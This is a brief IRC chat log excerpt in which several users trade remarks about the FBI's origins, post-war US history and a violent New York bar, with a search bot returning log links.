| asciilifeform: | typically not publicized , but they're there. | [18:57] |
| mircea_popescu: | mebbe. | [18:57] |
| asciilifeform: | ( recall how fbi was even created ) | [18:57] |
| mircea_popescu: | i was talking re "contempo" period, post ww2 not of the fucking know-nothing movement. | [18:59] |
| asciilifeform: | well yes, hoover's fbi | [18:59] |
| mircea_popescu: | !#s "the morgue" | [18:59] |
| a111: | 4 results for "\"the morgue\"", http://btcbase.org/log-search?q=%22the%20morgue%22 | [18:59] |
| mircea_popescu: | there was a bar in new york where ~100 people died /year because people got drunk and starting shooting pistols at each other. | [19:00] |
| mod6: | all of that, yet people are still 'maga' or whatever it is today | [20:09] |
| mod6: | as if | [20:09] |
Category: Logs
